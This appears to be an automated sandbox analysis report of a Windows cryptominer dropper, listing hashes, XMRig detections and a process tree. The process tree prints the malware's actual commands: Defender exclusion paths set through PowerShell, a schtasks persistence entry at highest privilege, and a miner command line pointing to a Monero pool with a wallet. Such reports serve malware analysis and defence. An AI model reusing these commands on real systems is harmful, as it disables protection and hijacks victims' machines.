Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
12-06-2023 01:46
Static task
static1
Behavioral task
behavioral1
Sample
d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe
Resource
win7-20230220-en
General
-
Target
d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe
-
Size
2.7MB
-
MD5
59bdfeadc9becdab96fe6110bd33ef9c
-
SHA1
33a4738eae2b0bae7f374398753a67d8e9f6ff52
-
SHA256
d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221
-
SHA512
484314e4dbaaf42cf5977a01243679dd24febd0f6edd3f3d0a2849981cd17cf9424ce36fba4848db0bb8dff40d0e780756c74fa3882efcc88d6db3461f6c2c4f
-
SSDEEP
12288:xoIuuRsY3/TwC7yA3bgH19Ay74Rcd6ijNqnW8feIX5GgvkUH7WEuQxXXTpr5qTYx:xDWHagHQk4agijNq6Eu8pn9yC
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/1960-209-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-210-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-211-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-213-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-214-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-215-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-216-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-217-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-218-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1960-221-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation HVPIO.exe -
Executes dropped EXE 1 IoCs
pid Process 5020 HVPIO.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5020 set thread context of 1960 5020 HVPIO.exe 107 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1564 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4420 timeout.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3248 powershell.exe 3936 powershell.exe 3936 powershell.exe 3248 powershell.exe 4092 powershell.exe 3800 powershell.exe 3800 powershell.exe 4092 powershell.exe 5020 HVPIO.exe 5020 HVPIO.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 2932 d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe Token: SeDebugPrivilege 3248 powershell.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeDebugPrivilege 5020 HVPIO.exe Token: SeDebugPrivilege 4092 powershell.exe Token: SeDebugPrivilege 3800 powershell.exe Token: SeLockMemoryPrivilege 1960 ngen.exe Token: SeLockMemoryPrivilege 1960 ngen.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1960 ngen.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2932 wrote to memory of 3936 2932 d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe 85 PID 2932 wrote to memory of 3936 2932 d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe 85 PID 2932 wrote to memory of 3248 2932 d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe 86 PID 2932 wrote to memory of 3248 2932 d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe 86 PID 2932 wrote to memory of 2024 2932 d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe 95 PID 2932 wrote to memory of 2024 2932 d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe 95 PID 2024 wrote to memory of 4420 2024 cmd.exe 97 PID 2024 wrote to memory of 4420 2024 cmd.exe 97 PID 2024 wrote to memory of 5020 2024 cmd.exe 99 PID 2024 wrote to memory of 5020 2024 cmd.exe 99 PID 5020 wrote to memory of 4092 5020 HVPIO.exe 100 PID 5020 wrote to memory of 4092 5020 HVPIO.exe 100 PID 5020 wrote to memory of 3800 5020 HVPIO.exe 103 PID 5020 wrote to memory of 3800 5020 HVPIO.exe 103 PID 5020 wrote to memory of 524 5020 HVPIO.exe 104 PID 5020 wrote to memory of 524 5020 HVPIO.exe 104 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 PID 5020 wrote to memory of 1960 5020 HVPIO.exe 107 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe"C:\Users\Admin\AppData\Local\Temp\d224dfde2a5b1d9d11cf216aadcc86cf33364aa44d8b76d8528d14183900e221.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDB13.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:4420
-
-
C:\ProgramData\Timeupper\HVPIO.exe"C:\ProgramData\Timeupper\HVPIO.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HVPIO" /tr "C:\ProgramData\Timeupper\HVPIO.exe"4⤵PID:524
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HVPIO" /tr "C:\ProgramData\Timeupper\HVPIO.exe"5⤵
- Creates scheduled task(s)
PID:1564
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1960
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
780.0MB
MD5c3ca05ddb228a7cdbb39064c85d8b245
SHA1f98416b4b8d05188f7f24ed26b4ba874a18f3924
SHA2561b9ed573b3ea7dd0967ff162aa59cf361852048db5f2063963f3bbe1788cbeb5
SHA512494b9049519014f137b8e21ee35840acd19a6dad709d0223426d86c63792710c8ac74030566fd610cf41065f6761f9e1b27ac0a3d0f0d16f8a40b1c8344c2379
-
Filesize
780.0MB
MD5c3ca05ddb228a7cdbb39064c85d8b245
SHA1f98416b4b8d05188f7f24ed26b4ba874a18f3924
SHA2561b9ed573b3ea7dd0967ff162aa59cf361852048db5f2063963f3bbe1788cbeb5
SHA512494b9049519014f137b8e21ee35840acd19a6dad709d0223426d86c63792710c8ac74030566fd610cf41065f6761f9e1b27ac0a3d0f0d16f8a40b1c8344c2379
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD5be95052f298019b83e11336567f385fc
SHA1556e6abda268afaeeec5e1ee65adc01660b70534
SHA256ebc004fe961bed86adc4025cdbe3349699a5a1fc328cc3a37f3ff055e7e82027
SHA512233df172f37f85d34448901057ff19f20792d6e139579a1235165d5f6056a2075c19c85bc9115a6bb74c9c949aebd7bb5391e2ae9f7b1af69e5c4aca3a48cff5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
143B
MD571f412258858d07d4ed21c352e44bcd5
SHA14b574d0047da11582589c7327765655fd0a2299c
SHA2562b8e2cd3ac0ec6efe1382a7641a8110a7f16f72f5aaf0986f99c01752943060a
SHA512750fe1955e8526d1afa9713ba102dea7149327526143e1f17487420b7b305f58117695a9e637ff5e1881eba84272531989848949ec0c12e12f118c09288aa27a